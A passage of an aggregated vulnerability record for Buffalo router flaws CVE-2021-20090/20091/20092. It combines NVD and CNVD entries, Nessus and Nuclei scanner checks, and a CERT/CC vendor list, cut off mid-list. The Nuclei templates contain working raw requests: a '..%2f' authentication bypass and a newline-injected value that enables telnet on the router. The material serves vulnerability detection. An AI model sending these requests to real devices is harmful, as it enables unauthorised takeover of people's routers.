The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
{"cnvd": [{"lastseen": "2022-11-05T11:07:04", "description": "Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are routers from Buffalo Japan.The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are vulnerable to code injection, which can be exploited by attackers to remotely execute code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T00:00:00", "type": "cnvd", "title": "Buffalo WSR-2533DHPL2 and WSR-2533DHP3 Code Injection Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20091"], "modified": "2021-07-30T00:00:00", "id": "CNVD-2021-56800", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-56800", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-07T16:21:25", "description": "The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T15:15:00", "type": "cve", "title": "CVE-2021-20091", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20091"], "modified": "2021-05-05T18:01:00", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "id": "CVE-2021-20091", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20091", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:03", "description": "A directory traversal vulnerability exists in Buffalo routers. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Buffalo Routers Directory Traversal (CVE-2021-20090; CVE-2021-20091)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091"], "modified": "2021-08-23T00:00:00", "id": "CPAI-2021-0497", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nuclei": [{"lastseen": "2023-12-07T22:11:37", "description": "\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "nuclei", "title": "Buffalo WSR-2533DHPL2 - Configuration File Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091"], "modified": "2023-12-05T00:00:00", "id": "NUCLEI:CVE-2021-20091", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-20091.yaml", "sourceData": "id: CVE-2021-20091\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Configuration File Injection\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.\n reference:\n - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-20091\n epss-score: 0.00928\n epss-percentile: 0.81194\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve,cve2021,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n POST /images/..%2fapply_abstract.cgi HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"/Success.htm\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n\n# digest: 4b0a00483046022100a9d0218e666d812c6c4a2daa70e18d141da012ad397defe99a448a60653f6beb022100e942d25e288d94f5770cc5263e99a2179a7cdb51cd6b835ae0560e391f7b858f:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T22:11:38", "description": "\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "nuclei", "title": "Buffalo WSR-2533DHPL2 - Improper Access Control", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2023-12-05T00:00:00", "id": "NUCLEI:CVE-2021-20092", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-20092.yaml", "sourceData": "id: CVE-2021-20092\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Improper Access Control\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the access control issue.\n reference:\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20092\n cwe-id: CWE-287\n epss-score: 0.01372\n epss-percentile: 0.84784\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve,cve2021,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\n Host: {{Hostname}}\n Cookie: lang=8; url=ping.html; mobile=false;\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/x-javascript\"\n\n - type: word\n words:\n - \"/*DEMO*/\"\n - \"addCfg(\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n\n# digest: 490a00463044022069ffd5f6dad61177e502063557b89ae45bedf7ad53a39e2b3901203f026dfb24022074ffed37ce22e883db1def11fe90103c6b904e5d9fe6a82d059e571ef9a65004:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-26T14:27:33", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-04T00:00:00", "type": "nessus", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2023-04-25T00:00:00", "cpe": ["x-cpe:/a:buffalo:buffalo"], "id": "BUFFALO_WSR_CVE_2021_20090.NASL", "href": "https://www.tenable.com/plugins/nessus/152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2023-12-07T17:26:40", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://vulners.com/cve/CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information\n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-10-07\n\n**Statement Date: October 07, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nJuniper Networks Junos OS and Junos OS Evolved are not affected by CVE-2021-20090, CVE-2021-20091, and CVE-2021-20092.\n\n#### References\n\n * [SIR-2021-353 and PR 1613180 were created for this issue.](<SIR-2021-353 and PR 1613180 were created for this issue.>)\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from 